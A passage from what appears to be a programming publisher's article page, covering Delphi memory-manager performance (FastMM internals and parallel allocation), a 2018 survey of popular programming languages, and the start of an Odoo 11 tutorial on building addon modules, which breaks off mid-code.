certainly fail: It is certainly possible to create records dynamically and use them instead of classes, but one question still remains—why? Why would we want to use records instead of objects when working with objects is simpler? The answer, in one word, is speed. The demo program, Allocate, shows the difference in execution speed. A click on the Allocate objects button will create ten million objects of type TNodeObj, which is a typical object that you would find in an implementation of a binary tree. Of course, the code then cleans up after itself by destroying all those objects: type TNodeObj = class Left, Right: TNodeObj; Data: NativeUInt; end; procedure TfrmAllocate.btnAllocClassClick(Sender: TObject); var i: Integer; nodes: TArray<TNodeObj>; begin SetLength(nodes, CNumNodes); for i := 0 to CNumNodes-1 do nodes[i] := TNodeObj.Create; for i := 0 to CNumNodes-1 do nodes[i].Free; end; A similar code, activated by the Allocate records button creates ten million records of type TNodeRec, which contains the same fields as TNodeObj: type PNodeRec = ^TNodeRec; TNodeRec = record Left, Right: PNodeRec; Data: NativeUInt; end; procedure TfrmAllocate.btnAllocRecordClick(Sender: TObject); var i: Integer; nodes: TArray<PNodeRec>; begin SetLength(nodes, CNumNodes); for i := 0 to CNumNodes-1 do New(nodes[i]); for i := 0 to CNumNodes-1 do Dispose(nodes[i]); end; Running both methods shows a big difference. While the class-based approach needs 366 ms to initialize objects and 76 ms to free them, the record-based approach needs only 76 ms to initialize records and 56 to free them. Where does that big difference come from? When you create an object of a class, lots of things happen. Firstly, TObject.NewInstance is called to allocate an object. That method calls TObject.InstanceSize to get the size of the object, then GetMem to allocate the memory and in the end, InitInstance which fills the allocated memory with zeros. Secondly, a chain of constructors is called. After all that, a chain of AfterConstruction methods is called (if such methods exist). All in all, that is quite a process which takes some time. Much less is going on when you create a record. If it contains only unmanaged fields, as in our example, a GetMem is called and that's all. If the record contains managed fields, this GetMem is followed by a call to the _Initialize method in the System unit which initializes managed fields. The problem with records is that we cannot declare generic pointers. When we are building trees, for example, we would like to store some data of type T in each node. The initial attempt at that, however, fails. The following code does not compile with the current Delphi compiler: type PNodeRec<T> = ^TNodeRec<T>; TNodeRec<T> = record Left, Right: PNodeRec<T>; Data: T; end; We can circumvent this by moving the TNodeRec<T> declaration inside the generic class that implements a tree. The following code from the Allocate demo shows how we could declare such internal type as a generic object and as a generic record: type TTree<T> = class strict private type TNodeObj<T1> = class Left, Right: TNodeObj<T1>; Data: T1; end; PNodeRec = ^TNodeRec; TNodeRec<T1> = record Left, Right: PNodeRec; Data: T1; end; TNodeRec = TNodeRec<T>; end; If you click the Allocate node<string> button, the code will create a TTree<string> object and then create 10 million class-based nodes and the same amount of record-based nodes. This time, New must initialize the managed field Data: string but the difference in speed is still big. The code needs 669 ms to create and destroy class-based nodes and 133 ms to create and destroy record-based nodes. Another big difference between classes and records is that each object contains two hidden pointer-sized fields. Because of that, each object is 8 bytes larger than you would expect (16 bytes in 64-bit mode). That amounts to 8 * 10,000,000 bytes or a bit over 76 megabytes. Records are therefore not only faster but also save space! FastMM internals To get a full speed out of anything, you have to understand how it works and memory managers are no exception to this rule. To write very fast Delphi applications, you should, therefore, understand how Delphi's default memory manager works. FastMM is not just a memory manager—it is three memory managers in one! It contains three significantly different subsystems—small block allocator, medium block allocator, and large block allocator. The first one, the allocator for small blocks, handles all memory blocks smaller than 2,5 KB. This boundary was determined by observing existing applications. As it turned out, in most Delphi applications, this covers 99% of all memory allocations. This is not surprising, as in most Delphi applications most memory is allocated when an application creates and destroys objects and works with arrays and strings, and those are rarely larger than a few hundred characters. Next comes the allocator for medium blocks, which are memory blocks with a size between 2,5 KB and 160 KB. The last one, allocator for large blocks, handles all other requests. The difference between allocators lies not just in the size of memory that they serve, but in the strategy they use to manage memory. The large block allocator implements the simplest strategy. Whenever it needs some memory, it gets it directly from Windows by calling VirtualAlloc. This function allocates memory in 4 KB blocks so this allocator could waste up to 4,095 bytes per request. As it is used only for blocks larger than 160 KB, this wasted memory doesn't significantly affect the program, though. The medium block allocator gets its memory from the large block allocator. It then carves this larger block into smaller blocks, as they are requested by the application. It also keeps all unused parts of the memory in a linked list so that it can quickly find a memory block that is still free. The small block allocator is where the real smarts of FastMM lies. There are actually 56 small memory allocators, each serving only one size of the memory block. The first one serves 8-byte blocks, the next one 16-byte blocks, followed by the allocator for 24, 32, 40, ... 256, 272, 288, ... 960, 1056, ... 2384, and 2608-byte blocks. They all get memory from the medium block allocator. If you want to see block sizes for all 56 allocators, open FastMM4.pas and search for SmallBlockTypes. What that actually means is that each memory allocation request will waste some memory. If you allocate 28 bytes, they'll be allocated from the 32-byte allocator, so 4 bytes will be wasted. If you allocate 250 bytes, they'll come from the 256-byte allocator and so on. The sizes of memory allocators were carefully chosen so that the amount of wasted memory is typically below 10%, so this doesn't represent a big problem in most applications. Each allocator is basically just an array of equally sized elements (memory blocks). When you allocate a small amount of memory, you'll get back one element of an array. All unused elements are connected into a linked list so that the memory manager can quickly find a free element of an array when it needs one. The following image shows a very simplified representation of FastMM allocators. Only two small block allocators are shown. Boxes with thick borders represent allocated memory. Boxes with thin borders represent unused (free) memory. Free memory blocks are connected into linked lists. Block sizes in different allocators are not to scale: FastMM implements a neat trick which helps a lot when you resize strings or arrays by a small amount. Well, the truth be told, I had to append lots and lots of characters—ten million of them—for this difference to show. If I were appending only a few characters, both versions would run at nearly the same speed. If you can, on the other hand, get your hands on a pre-2006 Delphi and run the demo program there, you'll see that the one-by-one approach runs terribly slow. The difference in speed will be of a few more orders of magnitude larger than in my example. The trick I'm talking about assumes that if you had resized memory once, you'll probably want to do it again, soon. If you are enlarging the memory, it will limit the smallest size of the new memory block to be at least twice the size of the original block plus 32 bytes. Next time you'll want to resize, FastMM will (hopefully) just update the internal information about the allocated memory and return the same block, knowing that there's enough space at the end. All that trickery is hard to understand without an example, so here's one. Let's say we have a string of 5 characters which neatly fits into a 24-byte block. Sorry, what am I hearing? "What? Why!? 5 unicode characters need only 10 bytes!" Oh, yes, strings are more complicated than I told you before. In reality, each Delphi UnicodeString and AnsiString contains some additional data besides the actual characters that make up the string. Parts of the string are also: 4-byte length of string, 4-byte reference count, 2-byte field storing the size of each string character (either 1 for AnsiString or 2 for UnicodeString), and 2-byte field storing the character code page. In addition to that, each string includes a terminating Chr(0) character. For a 5-character string this gives us 4 (length) + 4 (reference count) + 2 (character size) + 2 (codepage) + 5 (characters) * 2 (size of a character) + 2 (terminating Chr(0)) = 24 bytes. When you add one character to this string, the code will ask the memory manager to enlarge a 24-byte block to 26 bytes. Instead of returning a 26-byte block, FastMM will round that up to 2 * 24 + 32 = 80 bytes. Then it will look for an appropriate allocator, find one that serves 80-byte blocks (great, no memory loss!) and return a block from that allocator. It will, of course, also have to copy data from the original block to the new block. This formula, 2 * size + 32, is used only in small block allocators. A medium block allocator only overallocates by 25%, and a large block allocator doesn't implement this behavior at all. Next time you add one character to this string, FastMM will just look at the memory block, determine that there's still enough space inside this 80-byte memory block and return the same memory. This will continue for quite some time while the block grows to 80 bytes in two-byte increments. After that, the block will be resized to 2 * 80 + 32 = 192 bytes (yes, there is an allocator for this size), data will be copied and the game will continue. This behavior indeed wastes some memory but, under most circumstances, significantly boosts the speed of code that was not written with speed in mind. Memory allocation in a parallel world We've seen how FastMM boosts the reallocation speed. The life of a memory manager is simple when there is only one thread of execution inside a program. When the memory manager is dealing out the memory, it can be perfectly safe in the knowledge that nothing can interrupt it in this work. When we deal with parallel processing, however, multiple paths of execution simultaneously execute the same program and work on the same data. Because of that, life from the memory manager's perspective suddenly becomes very dangerous. For example, let's assume that one thread wants some memory. The memory manager finds a free memory block on a free list and prepares to return it. At that moment, however, another thread also needs some memory from the same allocator. This second execution thread (running in parallel with the first one) would also find a free memory block on the free list. If the first thread didn't yet update the free list, that may even be the same memory block! That can only result in one thing—complete confusion and crashing programs. It is extremely hard to write a code that manipulates some data structures (such as a free list) in a manner that functions correctly in a multithreaded world. So hard that FastMM doesn't even try it. Instead of that, it regulates access to each allocator with a lock. Each of the 56 small block allocators get their own lock, as do medium and large block allocators. When a program needs some memory from, say, a 16-byte allocator, FastMM will lock this allocator until the memory is returned to the program. If during this time, another thread requests a memory from the same 16-byte allocator, it will have to wait until the first thread finishes. This indeed fixes all problems but introduces a bottleneck—a part of the code where threads must wait to be processed in a serial fashion. If threads do lots of memory allocation, this serialization will completely negate the speed-up that we expected to get from the parallel approach. Such a memory manager would be useless in a parallel world. To fix that, FastMM introduces memory allocation optimization which only affects small blocks. When accessing a small block allocator, FastMM will try to lock it. If that fails, it will not wait for the allocator to become unlocked but will try to lock the allocator for the next block size. If that succeeds, it will return memory from the second allocator. That will indeed waste more memory but will help with the execution speed. If the second allocator also cannot be locked, FastMM will try to lock the allocator for yet the next block size. If the third allocator can be locked, you'll get back memory from it. Otherwise, FastMM will repeat the process from the beginning. This process can be somehow described with the following pseudo-code: allocIdx := find best allocator for the memory block repeat if can lock allocIdx then break; Inc(allocIdx); if can lock allocIdx then break; Inc(allocIdx); if can lock allocIdx then break; Dec(allocIdx, 2) until false allocate memory from allocIdx allocator unlock allocIdx A careful reader would notice that this code fails when the first line finds the last allocator in the table or the one before that. Instead of adding some conditional code to work around the problem, FastMM rather repeats the last allocator in the list three times. The table of small allocators actually ends with the following sizes: 1,984; 2,176; 2,384; 2,608; 2,608; 2,608. When requesting a block size above 2,384 the first line in the pseudo-code above will always find the first 2,608 allocator, so there will always be two more after it. This approach works great when memory is allocated but hides another problem. And how can I better explain a problem than with a demonstration ...? An example of this problem can be found in the program, ParallelAllocations. If you run it and click the Run button, the code will compare the serial version of some algorithm with a parallel one. I'm aware that I did not explain parallel programming at all, but the code is so simple that even somebody without any understanding of the topic will guess what it does. The core of a test runs a loop with the Execute method on all objects in a list. If a parallelTest flag is set, the loop is executed in parallel, otherwise, it is executed serially. The only mystery part in the code, TParallel.For does exactly what it says—executes a for loop in parallel. if parallelTest then TParallel.For(0, fList.Count - 1, procedure(i: integer) begin fList[i].Execute; end) else for i := 0 to fList.Count - 1 do fList[i].Execute; If you'll be running the program, make sure that you execute it without the debugger (Ctrl + Shift + F9 will do that). Running with the debugger slows down parallel execution and can skew the measurements. On my test machine I got the following results: In essence, parallelizing the program made it almost 4 times faster. Great result! Well, no. Not a great result. You see, the machine I was testing on has 12 cores. If all would be running in parallel, I would expect an almost 12x speed-up, not a mere 4-times improvement! If you take a look at the code, you'll see that each Execute allocates a ton of objects. It is obvious that a problem lies in the memory manager. The question remains though, where exactly lies this problem and how can we find it? I ran into exactly the same problem a few years ago. A highly parallel application which processes gigabytes and gigabytes of data was not running fast enough. There were no obvious problematic points and I suspected that the culprit was FastMM. I tried swapping the memory manager for a more multithreading-friendly one and, indeed, the problem was somehow reduced but I still wanted to know where the original sin lied in my code. I also wanted to continue using FastMM as it offers great debugging tools. In the end, I found no other solution than to dig in the FastMM internals, find out how it works, and add some logging there. More specifically, I wanted to know when a thread is waiting for a memory manager to become unlocked. I also wanted to know at which locations in my program this happens the most. To cut a (very) long story short, I extended FastMM with support for this kind of logging. This extension was later integrated into the main FastMM branch. As these changes are not included in Delphi, you have to take some steps to use this code. Firstly, you have to download FastMM from the official repository at https://github.com/pleriche/FastMM4. Then you have to unpack it somewhere on the disk and add FastMM4 as a first unit in the project file (.dpr). For example, the ParallelAllocation program starts like this: program ParallelAllocation; uses FastMM4 in 'FastMM\FastMM4.pas', Vcl.Forms, ParallelAllocationMain in 'ParallelAllocationMain.pas' {frmParallelAllocation}; When you have done that, you should firstly rebuild your program and test if everything is still working. (It should but you never know ...) To enable the memory manager logging, you have to define a conditional symbol LogLockContention, rebuild (as FastMM4 has to be recompiled) and, of course, run the program without the debugger. If you do that, you'll see that the program runs quite a bit slower than before. On my test machine, the parallel version was only 1.6x faster than the serial one. The logging takes its toll, but that is not important. The important part will appear when you close the program. At that point, the logger will collect all results and sort them by frequency. The 10 most frequent sources of locking in the program will be saved to a file called <programname>_MemoryManager_EventLog.txt. You will find it in the folder with the <programname>.exe. The three most frequent sources of locking will also be displayed on the screen. The following screenshot shows a cropped version of this log. Some important parts are marked out: For starters, we can see that at this location the program waited 19,020 times for a memory manager to become unlocked. Next, we can see that the memory function that caused the problem was FreeMem. Furthermore, we can see that somebody tried to delete from a list (InternalDoDelete) and that this deletion was called from TSpeedTest.Execute, line 130. FreeMem was called because the list in question is actually a TObjectList and deleting elements from the list caused it to be destroyed. The most important part here is the memory function causing the problem—FreeMem. Of course! Allocations are optimized. If an allocator is locked, the next one will be used and so on. Releasing memory, however, is not optimized! When we release a memory block, it must be returned to the same allocator that it came from. If two threads want to release memory to the same allocator at the same time, one will have to wait. I had an idea on how to improve this situation by adding a small stack (called release stack) to each allocator. When FreeMem is called and it cannot lock the allocator, the address of the memory block that is to be released will be stored on that stack. FreeMem will then quickly exit. When a FreeMem successfully locks an allocator, it firstly releases its own memory block. Then it checks if anything is waiting on the release stack and releases these memory blocks too (if there are any). This change is also included in the main FastMM branch, but it is not activated by default as it increases the overall memory consumption of the program. However, in some situations, it can do miracles and if you are developing multithreaded programs you certainly should test it out. To enable release stacks, open the project settings for the program, remove the conditional define LogLockContention (as that slows the program down) and add the conditional define UseReleaseStack. Rebuild, as FastMM4.pas has to be recompiled. On my test machine, I got much better results with this option enabled. Instead of a 3,9x speed-up, the parallel version was 6,3x faster than the serial one. The factor is not even close to 12x, as the threads do too much fighting for the memory, but the improvement is still significant: That is as far as FastMM will take us. For a faster execution, we need a more multithreading-friendly memory manager. To summarize, this article covered memory management techniques offered by Delphi. We looked into optimization, allocation, and internal of storage for efficient parallel programming. If you found this post useful, do check out the book Delphi High Performance to learn more about the intricacies of how to perform High-performance programming with Delphi. Read More: Exploring the Usages of Delphi Network programming 101 with GAWK (GNU AWK) A really basic guide to batch file programming
Read more
  • 0
  • 0
  • 27785

article-image-most-popular-programming-languages-in-2018
Fatema Patrawala
19 Jun 2018
11 min read
Save for later

The 5 most popular programming languages in 2018

Fatema Patrawala
19 Jun 2018
11 min read
Whether you’re new to software engineering or have years of experience under your belt, knowing what to learn can be difficult. Which programming language should you learn first? Which programming language should you learn next? There are hundreds of programming languages in widespread use. Each one has different features, many even have very different applications. Of course, many do not too - and knowing which one to use can be tough. Making those decisions is as important a part of being a developer as it is writing code. Just as English is the international language for most businesses and French is the language of love, different programming languages are better suited for different purposes. Let us take a look at what developers have chosen to be the top programming languages for 2018 in this year’s Packt Skill Up Survey. Source: Packt Skill Up Survey 2018 Java reigns supreme Java, the accessible and ever-present programming language continues to be widespread year on year. It is a 22 year old language which if put into human perspective is incredible. You would have been old enough to have finished college, have a celebratory alcoholic drink, gamble in Iowa and get married without parental consent in Mississippi! With time and age, Java has proven its consistency as a reliable programming language for engineers and developers. Our Skill Up 2018 survey data reveals it’s still the most popular programming language. Perhaps one of the reasons for this is Java’s flexibility and adaptability. Programs can run on several different types of machines; as long as the computer has a Java Runtime Environment (JRE) installed, a Java program can run on it. Most types of computers will be compatible with a JRE. PCs running on Windows, Macs, Unix or Linux computers, even large mainframe computers and mobile phones will be compatible with Java. Another reason for Java’s popularity is because it is object oriented. Java code is robust because Java objects contain no references to data external to themselves. This is why Java is so widely used across industry. It’s reliable and secure. When it's time for mobile developers to build Android apps, the first and most popular option is Java. Java is the official language for Android development which means it has great support from Google and most apps on Playstore are built on Java. If one talks about job opportunities in field of Java, there are plenty such as ‘Java-UI Developers’, ’Android Developers’ and many others. Hence, there are numerous jobs opportunities available in Java, J2EE combining with other new technologies. These technologies are among the highest paid jobs in IT industry today. According to Payscale, an average Java Developer salary in the USA is around $102,000 with salaries for job postings nationwide being 77% higher than average salaries. Some of the widely known domains where Java is used extensively is financial services, banking, stock market, retail and scientific and research communities. Finally, it’s worth noting that the demand for Java developers is pretty high and given it’s the language required in many engineering roles. It does make sense to start learning it if you don’t yet know it. Start learning Java. Explore Packt’s latest Java eBooks and videos Java Tutorials: Design a RESTful web API with Java JavaScript retains the runner up spot JavaScript for years kept featuring in the list of top programming languages and this time it is 2nd after Java. JavaScript has continued to be everywhere from front end web pages to mobile web apps and everything in between. A web developer can add personality to websites by using JavaScript. It is the native language of the browser. If you want to build single-page web apps, there is really only one language option for building client-side single-page apps, and that is JavaScript. It is supported by all popular browsers like Microsoft Internet Explorer (beginning with version 3.0), Firefox, Safari, Opera, Google Chrome, etc. JavaScript has been the most versatile and popular among developers because, it is simple to learn, gives extended functionality to web pages, is an inexpensive language. In other words, it does not require any special compilers or text editors to run the script. And it is simple to implement and is relatively fast for end users. After the release of Node.js in 2009, the "JavaScript everywhere" paradigm has become a reality. This server-side JavaScript framework allows to unify web application development around a single programming language, rather than rely on a different language. npm, Node.js's package manager, is the largest ecosystem of open source libraries in the world. Node.js is also being adopted in IoT projects due to its speed, number of plugins and scalability convenience. Another open-source JavaScript library known as React Native lets you build cross platform mobile applications in order to make a smooth transition from web to mobile. According to Daxx, JavaScript developers grab some of the highest paid tech salaries with an average of $96,000 in the US. There are plenty more sources that name JavaScript as one of the most sought-after skills in 2017. ITJobsWatch ranked JavaScript as the second most in-demand programming language in the UK, a conclusion based on the number of job ads posted over the last three months. Read More: 5 JavaScript Machine learning libraries you need to know Python on the rise Python is a general-purpose language; often described as utilitarian, a word which makes it sound a little boring. It is in fact anything but that. Why is it considered among the top programming languages? Simple: it is a truly universal language, applicable to a range of problems and areas. If programmers begin working with Python for one job or career, they can easily jump to another, even if it’s in an unrelated industry. Google uses Python in a number of applications. Additionally it has a developer portal devoted to Python. It features free classes so employees can learn more about the language. Here are just a few reasons why Python is so popular: Python comes with plenty of documentation, guides, tutorials and a developer community which is incredibly active for timely help and support. Python has Google as one of its corporate sponsors. Google contributes to the growing list of documentation and support tools, and effectively acts as a high profile evangelist for Python. Python is one of the most popular languages for data science. It’s used to build machine learning and AI systems. It comes with excellent sets of task specific libraries from Numpy and Scipy for scientific computing to Django for web development. Ask any Python developer and they have to agree Python is speedy, reliable and efficient. You can deploy Python applications on any environment and there is little to no performance loss no matter which platform. Python is easy to learn probably because it lets you think like programmer, as it is easily readable and almost looks like everyday English. The learning curve is very gradual than all other programming languages which tend to be quite steep. Python contains everything from data structures, tools, support, Python community, the Python Software Foundation and everything combined makes it a favorite among the developers. According to Gooroo, a platform that provides tech skill and salary analytics, Python is one of the highest-paying programming languages in the USA. In fact, at $103,492 per year, Python developers are on an average the second best-paid in the country. The language is used for system operations, web development, server and administrative tools, deployment, scientific modeling, and now in building AI and machine learning systems among others. Read More: What are professionals planning to learn this year? Python, deep learning, yes. But also... C# is not left behind Since the introduction of C# in 2002 by Microsoft, C#’s popularity has remained relatively high. It is a general-purpose language designed for developing apps on the Microsoft platform. C# can be used to create almost anything but it’s particularly strong at building Windows desktop applications and games. It can also be used to develop web applications and has become increasingly popular for mobile development too. Cross-platform tools such as Xamarin allow apps written in C# to be used on almost any mobile device. C# is widely used to create games using the Unity game engine, which is the most popular game engine today. Although C#’s syntax is more logical and consistent than C++, it is a complex language. Mastering it may take more time than languages like Python. The average pay for a C# Developer according to Payscale is $69,006 per year. With C# you have solid prospects as big finance corporations are using C# as their choice of language. In the News: Exciting New Features in C# 8.0 C# Tutorial: Behavior Scripting in C# and Javascript for game developers SQL remains strong The acronym SQL stands for Structured Query Language. This essentially means “a programming language that is used to communicate with database in a structured way”. Much like how Javascript is necessary for making websites exciting and more than just a static page, SQL is one of the only two languages widely used to communicate with databases. SQL is one of the very few languages where you describe what you want, not how to get it.  That means the database can be much more intelligent about how it decides to build its response, and is robust to changes in the computing environment it runs on. It is about a set theory which forces you to think very clearly about what it is you want, and express that in a precise way. More importantly, it gives you a vocabulary and set of tools for thinking about the problem you’re trying to solve without reference to the specific idioms of your application. SQL is a critical skill for many data-related roles. Data scientists and analysts will need to know SQL, for example. But as data reaches different parts of modern business, such as marketing and product management, it’s becoming a useful language for non-developers as well to learn. Source: Packt Skill Up Survey 2018 By far MySQL is still the most commonly used databases for web based applications in 2018, according to the report. It’s freeware, but it is frequently updated with features and security improvements. It offers a lot of functionality even for a free database engine. There are a variety of user interfaces that can be implemented. It can be made to work with other databases, including DB2 and Oracle. Organizations that need a robust database management tool but are on a budget, MySQL will be a perfect choice for them. The average salary for a Senior SQL Developer according to Glassdoor is $100,271 in the US. Unlike other areas in IT industry, job options and growth criteria for SQL developer is completely different. You may work as a database administrator, system manager, SQL professionals etc it completely depends on the functional knowledge and experience you have gained. Read More: 12 most common MySQL errors you should be aware of C++ also among favorites C++, the general purpose language for systems programming, was designed in 1979 by Bjarne Stroustrup. Despite competition from other powerful languages such as Java, Python, and SQL, it is still prevalent among developers. People have been predicting its demise for more than 20 years, but it's still growing. Basically, nothing that can handle complexity runs as fast as C++. C++ is designed for fairly hardcore applications, and it's generally used together with some scripting language or other. It is for building systems that need high performance, high reliability, small footprint, low energy consumption, all of these good things. That’s why you see telecom and financial applications built on C++. C++ is also considered to be one of the best solutions for creating applications that process music and film. There is even an extensive list of websites and tools created based on C++. Financial analysts predict that earnings in this specialization will reach at least $102,000 per year. C++ Tutorials: Getting started with C++ Features Read More: Working with Shaders in C++ to create 3D games Other programming languages like C, PHP, Swift, Go etc were also on the developer’s choice list. The creation of supporting technologies in the last few years has given rise to speculation that programming languages are converging in terms of their capabilities. For example, Node.js enables Javascript developers to create back-end functionalities - relinquishing the need to learn PHP or even hiring a separate back-end developer altogether. As of now, we can only speculate on future tech trends. However, definitely it will be worth keeping an eye out for which horse to bet on! 20 ways to describe programming in 5 words A really basic guide to batch file programming What is Mob Programming?
Read more
  • 0
  • 1
  • 49976

article-image-step-by-step-guide-to-creating-odoo-addon-modules
Sugandha Lahoti
19 Jun 2018
15 min read
Save for later

A step by step guide to creating Odoo Addon Modules

Sugandha Lahoti
19 Jun 2018
15 min read
Odoo uses a client/server architecture in which clients are web browsers accessing the Odoo server via RPC. Both the server and client extensions are packaged as modules which are optionally loaded in a database. Odoo modules can either add brand new business logic to an Odoo system or alter and extend existing business logic. Everything in Odoo starts and ends with modules. In this article, we will cover the basics of creating Odoo Addon Modules. Recipes that we will cover in this. Creating and installing a new addon module Completing the addon module manifest Organizing the addon module file structure Adding Models Our main goal here is to understand how an addon module is structured and the typical incremental workflow to add components to it. This post is an excerpt from the book Odoo 11 Development Cookbook - Second Edition by Alexandre Fayolle and Holger Brunn. With this book, you can create fast and efficient server-side applications using the latest features of Odoo v11. For this article, you should have Odoo installed. You are also expected to be comfortable in discovering and installing extra addon modules. Creating and installing a new addon module In this recipe, we will create a new module, make it available in our Odoo instance, and install it. Getting ready We will need an Odoo instance ready to use. For explanation purposes, we will assume Odoo is available at ~/odoo-dev/odoo, although any other location of your preference can be used. We will also need a location for our Odoo modules. For the purpose of this recipe, we will use a local-addons directory alongside the odoo directory, at ~/odoo-dev/local-addons. How to do it... The following steps will create and install a new addon module: Change the working directory in which we will work and create the addons directory where our custom module will be placed: $ cd ~/odoo-dev $ mkdir local-addons Choose a technical name for the new module and create a directory with that name for the module. For our example, we will use my_module: $ mkdir local-addons/my_module A module's technical name must be a valid Python identifier; it must begin with a letter, and only contain letters (preferably lowercase), numbers, and underscore characters. Make the Python module importable by adding an __init__.py file: $ touch local-addons/my_module/__init__.py Add a minimal module manifest for Odoo to detect it. Create a __manifest__.py file with this line: {'name': 'My module'} Start your Odoo instance including our module directory in the addons path: $ odoo/odoo-bin --addons-path=odoo/addon/,local-addons/ If the --save option is added to the Odoo command, the addons path will be saved in the configuration file. Next time you start the server, if no addons path option is provided, this will be used. Make the new module available in your Odoo instance; log in to Odoo using admin, enable the Developer Mode in the About box, and in the Apps top menu, select Update Apps List. Now, Odoo should know about our Odoo module. Select the Apps menu at the top and, in the search bar in the top-right, delete the default Apps filter and search for my_module. Click on its Install button, and the installation will be concluded. How it works... An Odoo module is a directory containing code files and other assets. The directory name used is the module's technical name. The name key in the module manifest is its title. The __manifest__.py file is the module manifest. It contains a Python dictionary with information about the module, the modules it depends on, and the data files that it will load. In the example, a minimal manifest file was used, but in real modules, we will want to add a few other important keys. These are discussed in the Completing the module manifest recipe, which we will see next. The module directory must be Python-importable, so it also needs to have an __init__.py file, even if it's empty. To load a module, the Odoo server will import it. This will cause the code in the __init__.py file to be executed, so it works as an entry point to run the module Python code. Due to this, it will usually contain import statements to load the module Python files and submodules. Known modules can be installed directly from the command line using the --init or -i option. This list is initially set when you create a new database, from the modules found on the addons path provided at that time. It can be updated in an existing database with the Update Module List menu. Completing the addon module manifest The manifest is an important piece for Odoo modules. It contains important information about the module and declares the data files that should be loaded. Getting ready We should have a module to work with, already containing a __manifest__.py manifest file. You may want to follow the previous recipe to provide such a module to work with. How to do it... We will add a manifest file and an icon to our addon module: To create a manifest file with the most relevant keys, edit the module __manifest__.py file to look like this: { 'name': "Title", 'summary': "Short subtitle phrase", 'description': """Long description""", 'author': "Your name", 'license': "AGPL-3", 'website': "http://www.example.com", 'category': 'Uncategorized', 'version': '11.0.1.0.0', 'depends': ['base'], 'data': ['views.xml'], 'demo': ['demo.xml'], } To add an icon for the module, choose a PNG image to use and copy it to static/description/icon.png. How it works... The remaining content is a regular Python dictionary, with keys and values. The example manifest we used contains the most relevant keys: name: This is the title for the module. summary: This is the subtitle with a one-line description. description: This is a long description written in plain text or the ReStructuredText (RST) format. It is usually surrounded by triple quotes, and is used in Python to delimit multiline texts. For an RST quickstart reference, visit http://docutils.sourceforge.net/docs/user/rst/quickstart.html. author: This is a string with the name of the authors. When there is more than one, it is common practice to use a comma to separate their names, but note that it still should be a string, not a Python list. license: This is the identifier for the license under which the module is made available. It is limited to a predefined list, and the most frequent option is AGPL-3. Other possibilities include LGPL-3, Other OSI approved license, and Other proprietary. website: This is a URL people should visit to know more about the module or the authors. category: This is used to organize modules in areas of interest. The list of the standard category names available can be seen at https://github.com/odoo/odoo/blob/11.0/odoo/addons/base/module/module_data.xml. However, it's also possible to define other new category names here. version: This is the modules' version numbers. It can be used by the Odoo app store to detect newer versions for installed modules. If the version number does not begin with the Odoo target version (for example, 11.0), it will be automatically added. Nevertheless, it will be more informative if you explicitly state the Odoo target version, for example, using 11.0.1.0.0 or 11.0.1.0 instead of 1.0.0 or 1.0. depends: This is a list with the technical names of the modules it directly depends on. If none, we should at least depend on the base module. Don't forget to include any module defining XML IDs, Views, or Models referenced by this module. That will ensure that they all load in the correct order, avoiding hard-to-debug errors. data: This is a list of relative paths to the data files to load with module installation or upgrade. The paths are relative to the module root directory. Usually, these are XML and CSV files, but it's also possible to have YAML data files. demo: This is the list of relative paths to the files with demonstration data to load. These will only be loaded if the database was created with the Demo Data flag enabled. The image that is used as the module icon is the PNG file at static/description/icon.png. Odoo is expected to have significant changes between major versions, so modules built for one major version are likely to not be compatible with the next version without conversion and migration work. Due to this, it's important to be sure about a module's Odoo target version before installing it. There's more… Instead of having the long description in the module manifest, it's possible to have it in its own file. Since version 8.0, it can be replaced by a README file, with either a .txt, .rst, or an .md (Markdown) extension. Otherwise, include a description/index.html file in the module. This HTML description will override a description defined in the manifest file. There are a few more keys that are frequently used: application: If this is True, the module is listed as an application. Usually, this is used for the central module of a functional area auto_install: If this is True, it indicates that this is a "glue" module, which is automatically installed when all of its dependencies are installed installable: If this is True (the default value), it indicates that the module is available for installation Organizing the addon module file structure An addon module contains code files and other assets such as XML files and images. For most of these files, we are free to choose where to place them inside the module directory. However, Odoo uses some conventions on the module structure, so it is advisable to follow them. Getting ready We are expected to have an addon module directory with only the __init__.py and __manifest__.py files. In this recipe, we suppose this is local-addons/my_module. How to do it... To create the basic skeleton for the addon module, perform the given steps: Create the directories for code files: $ cd local-addons/my_module $ mkdir models $ touch models/__init__.py $ mkdir controllers $ touch controllers/__init__.py $ mkdir views $ mkdir security $ mkdir data $ mkdir demo $ mkdir i18n $ mkdir -p static/description Edit the module's top __init__.py file so that the code in subdirectories is loaded: from . import models from . import controllers This should get us started with a structure containing the most used directories, similar to this one: . ├── __init__.py ├── __manifest__.py │ ├── controllers │ └── __init__.py ├── data ├── demo ├── i18n ├── models │ └── __init__.py ├── security ├── static │ └── description └── views How it works... To provide some context, an Odoo addon module can have three types of files:  The Python code is loaded by the __init__.py files, where the .py files and code subdirectories are imported. Subdirectories containing code Python, in turn, need their own __init__.py. Data files that are to be declared in the data and demo keys of the __manifest__.py module manifest in order to be loaded are usually XML and CSV files for the user interface, fixture data, and demonstration data. There can also be YAML files, which can include some procedural instructions that are run when the module is loaded, for instance, to generate or update records programmatically rather than statically in an XML file. Web assets such as JavaScript code and libraries, CSS, and QWeb/HTML templates also play an important part. There are declared through an XML file extending the master templates to add these assets to the web client or website pages. The addon files are to be organized in these directories: models/ contains the backend code files, creating the Models and their business logic. A file per Model is recommended, with the same name as the model, for example, library_book.py for the library.book model. views/ contains the XML files for the user interface, with the actions, forms, lists, and so on. As with models, it is advised to have one file per model. Filenames for website templates are expected to end with the _template suffix. data/ contains other data files with module initial data. demo/ contains data files with demonstration data, useful for tests, training, or module evaluation. i18n/ is where Odoo will look for the translation .pot and .po files. These files don't need to be mentioned in the manifest file. security/ contains the data files defining access control lists, usually a ir.model.access.csv file, and possibly an XML file to define access Groups and Record Rules for row level security. controllers/ contains the code files for the website controllers, and for modules providing that kind of feature. static/ is where all web assets are expected to be placed. Unlike other directories, this directory name is not just a convention, and only files inside it can be made available for the Odoo web pages. They don't need to be mentioned in the module manifest, but will have to be referred to in the web template. When adding new files to a module, don't forget to declare them either in the __manifest__.py (for data files) or __init__.py (for code files); otherwise, those files will be ignored and won't be loaded. Adding models Models define the data structures to be used by our business applications. This recipe shows how to add a basic model to a module. We will use a simple book library example to explain this; we want a model to represent books. Each book has a name and a list of authors. Getting ready We should have a module to work with. We will use an empty my_module for our explanation. How to do it... To add a new Model, we add a Python file describing it and then upgrade the addon module (or install it, if it was not already done). The paths used are relative to our addon module location (for example, ~/odoo-dev/local-addons/my_module/): Add a Python file to the models/library_book.py module with the following code: from odoo import models, 